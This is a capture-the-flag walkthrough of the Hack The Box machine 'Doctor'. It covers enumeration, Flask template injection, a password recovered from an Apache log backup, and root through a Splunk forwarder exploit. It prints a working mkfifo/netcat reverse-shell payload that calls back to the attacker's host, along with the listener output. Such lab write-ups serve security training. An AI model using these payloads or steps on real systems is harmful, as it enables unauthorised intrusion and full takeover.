Posts Doctor Writeup [HTB]
Post
Cancel

Doctor Writeup [HTB]

Doctor is a linux machine rated as easy from Hack The Box, it consists on finding a virtual hosts which contains a messaging service vulnerable to server-side template injection, then after obtaining access a root shell can be obtained abusing splunk forwarder.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -sC -sV doctor.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 17:01 CEST
Nmap scan report for doctor.htb (10.129.18.114)
Host is up (0.047s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following page : Web

Scrolling down a bit we can see an email : info@doctors.htb so I decided to add it to my hosts file as it could be a virtual host.

Web

Browsing to doctors.htb we are greeted with a login form , but there’s an option to register new users:

Web

So we can create an account and access the site :

Web

Once being logged in we can create messages :

Web

Now, we can use gobuster to discover hidden directories :

1
2
3
4
5
6
7
gobuster dir -u http://doctors.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/register (Status: 200)
/account (Status: 302)
/archive (Status: 200)
/login (Status: 200)
/home (Status: 302)
/logout (Status: 302)

Browsing to /archive it seems that it is empty but inspecting the source code we can see the title of our message:

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8" ?>
	<rss version="2.0">
	<channel>
 	<title>Archive</title>
 	<item><title>Test</title></item>

			</channel>

Checking wappalyzer we see the site has been built using flask and python 3:

Web

Taking this into account, we can try to see if the site is vulnerable to SSTI (server-side template injection), to do it we will input a mathematical expression and then check if it has been evaluated:

Web

Going to /archive we see we have got the result of the mathematical operation , so the site is vulnerable to ssti :

1
2
3
4
5
6
7
8
9
10
11
<?xml version="1.0" encoding="UTF-8" ?>
	<rss version="2.0">
	<channel>
 	<title>Archive</title>
 	<item><title>Test</title></item>

			</channel>
			<item><title>14</title></item>

			</channel>

Exploitation

Now we can try to get a python reverse shell using a payload from PayloadAllTheThings

Web

After posting the message we trigger it browsing to /archive, checking netcat we get a reverse shell as web:

1
2
3
4
5
6
7
8
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 49186
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
$ whoami
web

Now we need to pivot to other user, shaun :

1
2
web@doctor:/home$ ls
shaun  web

Inside the apache2 logs folder, there was a file which caught my attention called backup :

1
2
3
4
5
6
7
8
9
web@doctor:/var/log/apache2$ ls
access.log        access.log.6.gz  error.log.11.gz  error.log.6.gz
access.log.1      access.log.7.gz  error.log.12.gz  error.log.7.gz
access.log.10.gz  access.log.8.gz  error.log.13.gz  error.log.8.gz
access.log.11.gz  access.log.9.gz  error.log.14.gz  error.log.9.gz
access.log.2.gz   backup           error.log.2.gz   other_vhosts_access.log
access.log.3.gz   error.log        error.log.3.gz
access.log.4.gz   error.log.1      error.log.4.gz
access.log.5.gz   error.log.10.gz  error.log.5.gz

Grepping for a password inside it we get the credentials for pivoting to shaun :

1
2
3
4
5
6
web@doctor:/var/log/apache2$ cat backup | grep password
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$ su shaun
Password:
shaun@doctor:/var/log/apache2$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)

Privilege Escalation

Going back to the nmap scan, we found that port 8089 was open running Splunk.

Inside /opt directory there was another dir called splunkforwarder :

1
2
shaun@doctor:/opt$ ls
clean  splunkforwarder

Searching for splunkforwarder privilege escalation I came across the following exploit

This github repo contains two exploits, a local and a remote one, as the exploit was written in python2 and the machine had python3 I decided to go with the remote exploit .

With this exploit we can abuse Splunk Universal Forwarder by configuring it to use our machine as deployment server, then we the connection is done our machine will send a malicious code as deployment applications.

For running the exploit remotely we need to use shaun credentials instead of the default ones, then we can specify the payload to obtain a reverse shell through netcat.

Running the exploit :

1
2
3
4
5
6
7
8
9
10
11
12
python splunk.py --host doctor.htb --port 8089 --lhost 10.10.14.161 --username shaun --password Guitar123
--payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.161 4444 >/tmp/f'
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpPYWA_O.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.161:8181/
10.129.18.114 - - [27/Sep/2020 22:36:35] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

Checking netcat we have obtained a root shell :

1
2
3
4
5
6
7
8
9
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 38832
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
doctor
This post is licensed under CC BY 4.0 by the author.